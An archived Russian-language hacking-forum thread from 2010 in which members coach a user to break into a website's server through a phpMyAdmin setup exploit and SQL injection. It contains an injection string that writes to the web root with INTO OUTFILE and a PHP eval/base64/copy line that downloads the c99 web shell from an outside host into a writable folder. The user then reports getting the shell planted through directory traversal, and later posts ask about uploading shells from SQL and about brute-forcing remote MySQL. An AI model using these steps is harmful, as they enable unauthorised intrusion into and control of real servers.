ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
22.05.2010, 14:29
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
уважаемый Jokester почитайте это:
https://forum.antichat.ru/threadnav30501-1-10.html
5 пост
|
|
|
22.05.2010, 14:33
|
|
Новичок
Регистрация: 28.10.2008
Сообщений: 14
Провел на форуме:
92208
Репутация:
6
|
|
Сообщение от Jokester
CTAPu4OK
Надеюсь ты сам понимаешь что хочешь?
Объясни по русски, что у тебя там имеется в наличии
1 Если есть исполнение кода и папки на запись, то почему ты не можешь залить шелл?
2 Если есть рутовый доступ в ПМА то о каких кавычках ты говоришь?
phpinfo() покажи тут. А именно диррективы
allow_url_fopen
allow_url_include
disable_functions
magic_quotes_gpc
open_basedir
safe_mode
И напиши что конкретно у тебя имеется. А то по твоим словам я не понимаю у тебя ПМА на том-же сервере, или на другом вообще.
ПМА на сервере с сайтом (сервер 1)
Эксплойт на другом сервере (сервер 2)
TXT файл с командами для эксплойта (сервер 3)
т.е. вот конф файл эксплойта
PHP код:
$pma_setup_url = 'blablabla'; /*полный адрес скрипта установки phpMyAdmin (Сервер 1)*/
$ftp_code = 'blablabla'; /*полный ftp-путь до файла с содержимым <? phpinfo();exit; ?> (Сервер 3)*/
Что у меня есть: 
Эксплойт пма через Setup.php, возможность использовать стандартные команды на сервере ограниченного пользователя (просмотр всего содержимого, инфу сервера), использование коротких пхп скриптов.
SQL Inj, Могу просматривать таблицы, колонки (минус в том что могу просматривать только с помощью limit или group_concat, пользователей очень много и найти среди них админа (Хоть и знаю логин) этими методами займут очень много времени ( если ошибаюсь поправьте меня) и не факт что в админке будет аплоад), так же могу просматривать файлы с помощью LOAD_FILE
Папки 777
Чего не могу:
експлойт пма: Не могу выполнять команды "перемещения, записи, редактирования, удаления, переименовывания, инклюды, архивация, дампы и тд."
SQL INJ: залить файл на сервер (из за ковычек), прочитать конфигурационные файлы "config.php"
Не могу выйти за пределы папки www с помощью експлойта пма, а с помощью SQL INJ могу
Не могу увидеть на экране ошибки которые выдает mysql, а где он хранит логи я не знаю =(
1. Исполнение есть, но ограниченное, не знаю как объяснить на научном но некоторые команды пашут а некоторые нет, и после каждой команды идет закрытие работы с сервером.
2. Рутового доступа в пма у меня нету, у меня есть доступ под юзверем apache который состоит в ограниченной группе apache. и рутовый доступ SQL INJ.
allow_url_fopen On
allow_url_include Нету такого
disable_functions no value
magic_quotes_gpc On
open_basedir .
safe_mode Off
-587955+union+select+1,2,3,4,0x6869,6,7,8,9,10,11+i nto+outfile+'/home/data/www/'+from+mysql.user--
Вроде бы все написал и не где не ошибся)
Последний раз редактировалось CTAPu4OK; 22.05.2010 в 14:36..
|
|
|
|
22.05.2010, 14:39
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Сообщение от pinch
уважаемый Jokester почитайте это:
https://forum.antichat.ru/threadnav30501-1-10.html
5 пост
Я так понимаю, ты утверждаешь, что там нет инъекции?
Или в этих базах вообще невозможна инъекция?
Или что ты хотел этим сказать?
И при чём тут "низкий уровень"? Ты просто прочитал это там, и теперь не разобравшись о чём речь везде это пишешь, или у тебя есть свой взгляд на это, и ты способен своими словами, без линков описать мне, ЧТО ТЫ ХОТЕЛ ЭТИМ СКАЗАТЬ?
|
|
|
|
22.05.2010, 14:48
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
Я так понимаю, ты утверждаешь, что там нет инъекции? Или в этих базах вообще невозможна инъекция? Или что ты хотел этим сказать? И при чём тут "низкий уровень"? Ты просто прочитал это там, и теперь не разобравшись о чём речь везде это пишешь, или у тебя есть свой взгляд на это, и ты способен своими словами, без линков описать мне, ЧТО ТЫ ХОТЕЛ ЭТИМ СКАЗАТЬ?
1. Да нет инъекции
2. -//-//-//-//-
3. -//-//-//-//-
4. ?
5. Да я просто прочитал это и везде пишу, у меня нету никаких взглядов на это.
p.s. видимо я ошибался=( т.к.
https://forum.antichat.net/showpost.php?p=474995&postcount=1
|
|
|
|
22.05.2010, 15:18
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Сообщение от CTAPu4OK
Чего не могу:
експлойт пма: Не могу выполнять команды "перемещения, записи, редактирования, удаления, переименовывания, инклюды, архивация, дампы и тд."
..........
1. Исполнение есть, но ограниченное, не знаю как объяснить на научном но некоторые команды пашут а некоторые нет, и после каждой команды идет закрытие работы с сервером.
Не думаю что такое возможно. Не знаю что там у тебя за сплоит, но если он выполняет код, и есть папка на запись, то и шелл он зальёт. Просто ты что-то не так делаешь.
Кавычки тут роль особую не играют, тебе уже сказали что нужно сделать:
ev=eval(base64_decode(copy("http://madnet.name/files/download/9_c99madshell.php","/папка/на/запись.шелл.php")  );
Только разумеется вот это
"http://madnet.name/files/download/9_c99madshell.php","/папка/на/запись.шелл.php");
кодируешь в бейс
При твоих настройках должно работать без проблем.
Хотя, я ХЗ что там у тебя за чудосплоит
========================
pinch
ОК, ты пожалуйста будь повнимательнее, и прежде чем советовать что-то посмотри и проверь сам. Скуль там есть, разумеется, просто фильтрация union и select.
Ну и уж конечно, в этих базах, как и во всех других без проблем проводятся скули, просто как и везде своя специфика
|
|
|
|
22.05.2010, 15:22
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
ok=)...
|
|
|
|
22.05.2010, 15:58
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319
Репутация:
-16
|
|
коqда заливаем шелл c sql только из mysql.user мойно заливать?
а например если нето mysql.user-a мойно заливать шелл из напримерь с admin или users table-oм ?
|
|
|
|
22.05.2010, 16:14
|
|
Познающий
Регистрация: 21.02.2009
Сообщений: 54
Провел на форуме:
1224548
Репутация:
134
|
|
Сообщение от LokbatanLi
коqда заливаем шелл c sql только из mysql.user мойно заливать?
а например если нето mysql.user-a мойно заливать шелл из напримерь с admin или users table-oм ?
Из mysql.user можно узнать хватает ли прав, именно это подразумевается по идее, а собственно код шелла можно писать откуда угодно.
|
|
|
|
22.05.2010, 16:43
|
|
Новичок
Регистрация: 28.10.2008
Сообщений: 14
Провел на форуме:
92208
Репутация:
6
|
|
Сообщение от Jokester
Не думаю что такое возможно. Не знаю что там у тебя за сплоит, но если он выполняет код, и есть папка на запись, то и шелл он зальёт. Просто ты что-то не так делаешь.
Кавычки тут роль особую не играют, тебе уже сказали что нужно сделать:
ev=eval(base64_decode(copy("http://madnet.name/files/download/9_c99madshell.php","/папка/на/запись.шелл.php") );
Только разумеется вот это
"http://madnet.name/files/download/9_c99madshell.php","/папка/на/запись.шелл.php");
кодируешь в бейс
При твоих настройках должно работать без проблем.
Хотя, я ХЗ что там у тебя за чудосплоит
========================
pinch
ОК, ты пожалуйста будь повнимательнее, и прежде чем советовать что-то посмотри и проверь сам. Скуль там есть, разумеется, просто фильтрация union и select.
Ну и уж конечно, в этих базах, как и во всех других без проблем проводятся скули, просто как и везде своя специфика Вот тут самое интересное, base64 не работает не у меня на компе не на сервере. нечего не выдает и нечего не сохраняет)
Если чисто copy, на моем компе сохраняет шелл, на сервере выполняется нормально но файл не появляется)
И вот еще вопрос, зависит ли это на заливку:
по умолчанию я нахожусь (выполняю команды из/от) по адресу /home/data/www/myadmin/scripts/ но сохраняю через скрипт в каталог /home/data/www/images/tep но пользователем apache я не могу выйти за пределы www
Так вот может надо писать так:
../home/data/www/images/tep
или так
/www/images/tep
или так
../../../home/data/www/images/tep
или даже так
../../../images/tep / ?
пы.сы. права на папки все проставлены 100%
Все, всем пасиб =)
../../../../../home/data/www/images/tep
Вот так вот пошло))
Последний раз редактировалось CTAPu4OK; 22.05.2010 в 17:08..
|
|
|
|
22.05.2010, 20:21
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744
Репутация:
18
|
|
Подскажите плиз брут для mysql на удаленном хосте на 3306 порту (если есть такое)!
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
